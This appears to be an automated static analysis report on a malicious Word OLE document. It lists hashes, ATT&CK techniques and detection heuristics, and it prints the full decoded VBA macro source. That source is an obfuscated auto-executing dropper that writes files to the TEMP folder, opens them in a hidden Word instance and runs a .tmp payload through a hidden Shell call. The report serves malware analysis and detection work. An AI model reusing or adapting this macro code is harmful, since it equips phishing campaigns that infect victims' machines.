Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cb1db07d891e8ab9…

MALICIOUS

Office (OLE)

Size: 154.0 KB
Created: 2016-04-28 08:33:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: 065ab1f228d14047b0937f18e3ae6a1a
SHA-1: 9b72d7ce1ef63b5eeafacf6f50c2c653a769c6d1
SHA-256: cb1db07d891e8ab9433ec28556bab79658ea9bd901f14289ecbe461884ac6906
Risk Score: 554

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1137.002 DLL Search Order Hijacking
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

This document is malicious due to the presence of obfuscated VBA macros that trigger on opening. The macros attempt to execute an embedded PE file and use CreateObject, most likely to download and run a second-stage payload. The combination of AutoOpen and Workbook_Open macros with the embedded executable strongly suggests downloader or dropper functionality.

Heuristics 17

  • OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514
    Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
  • ClamAV: Doc.Macro.ObfuscatedChr-6203136-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ObfuscatedChr-6203136-0
  • XOR-encoded strings (key 0x79) critical SC_XOR_ENCODED
    Found 8 Windows library/API name(s) XOR-encoded with single-byte key 0x79: 'LoadLibraryA', 'GetProcAddress', 'ExitProcess', 'CreateFileA', 'InternetOpenA', 'HttpOpenRequestA', 'HttpSendRequestA', 'WriteProcessMemory'
    Disassembly
    Attempted x86 opcode disassembly
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Dim hhf As Variant
    hhf = Shell(uyt, 0)
    End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
    Set meLaTure = CreateObject("W" & "" & "or" & "d." & "Applicatio" & BHJASD)
    HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub AutoOpen()
        VBJHQWD = "12kj12vhg12" & ";12[]1l '1"
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Sub
    Sub Workbook_Open()
        GhbGGbv
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    End Function
    Sub Auto_Open()
        Lashature
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    TTGDFW = FygGr(3 + 90 + sts)
    DBDDW = Environ(TYGE) + TTGDFW
    JIEKR = "." & "tmp" & ""
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3013 bytes
SHA-256: 69313b5a5e675995433c629062c9a674f7284a9c7a616bcd101b4cebdc51b842
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
    VBJHQWD = "12kj12vhg12" & ";12[]1l '1"
    GhbGGbv
End Sub
Sub Workbook_Open()
    GhbGGbv
End Sub
Sub GhbGGbv()
    Lashature
End Sub
Sub Lashature()
Dim bbgd As Boolean, sts As Integer, YGEW As String
VBHJQW = "1h2jben1v"
sts = -42 + 41
TYGE = "T" & "EM" & ""
TYGE = TYGE & "P"
bbgd = False
On Error Resume Next
Dim WOIEW As String
TTGDFW = FygGr(3 + 90 + sts)
DBDDW = Environ(TYGE) + TTGDFW
JIEKR = "." & "tmp" & ""
FFDRRF = "" & ".rtf"
LQWDO = DBDDW

FFFNNNF = LQWDO + "byfe" + FFDRRF
SSHHDD = DBDDW & "jwud" + FFDRRF
WOIEW = DBDDW & "" & "s3" & JIEKR

FssGeww (FFFNNNF)
FssGeww (SSHHDD)

Module1.Tyryka (2)
BHJASD = Chr(102 + 8)
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
Set meLaTure = CreateObject("W" & "" & "or" & "d." & "Applicatio" & BHJASD)
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
meLaTure.Visible = bbgd
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
meLaTure.Documents.Open (FFFNNNF)
Module1.Tyryka (2)
HYUASGD = Module1.Girow(WOIEW)
Module1.Tyryka (3)
meLaTure.Quit
Set meLaTure = Nothing
End Sub
Public Function FygGr(wbrw As Integer)
    FygGr = Chr(wbrw)
End Function
Public Function FssGeww(vnhe As String)
    ActiveDocument.SaveAs FileName:=vnhe, FileFormat:=5 + 1
End Function
Public Function TYGEvs()
    TYGEvs = "T" & "EM"
End Function
Sub Auto_Open()
    Lashature
End Sub

Attribute VB_Name = "Module1"
Sub Tyryka(Lknd As Long)
bfh = 53
Dim Khge As Long, Rtge As Long
Rtge = Lknd + Timer
Khge = Rtge
Do While Timer < Khge
vhue = 64 * 3 * 4 * 1 * 1 * 3 * 1
Loop
bfhre = 93 + 1
VAYTWGD = ";l1k23 ;l12" & "12j"
TWQYJDA = "'1;2l '12;"
BFHJASD = "1h2jkh32121"
End Sub
Public Function Girow(uyt As String)
Dim hhf As Variant
hhf = Shell(uyt, 0)
End Function
embedded_office_0000624c.exe | embedded-pe | Office MZ+PE at offset 0x624C | 132569 bytes
SHA-256: 9e72ca4bb7e17a1e59015f971a9c6a05f73dc197b2c2accef2fe41bebbe03493
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin | ole-package | OLE Ole10Native stream: ObjectPool/_1523370757/Ole10Native | 107206 bytes
SHA-256: 4c2d816070439979baaefafa061c0873ad2aa9838e8fec3bf40be0c0da313274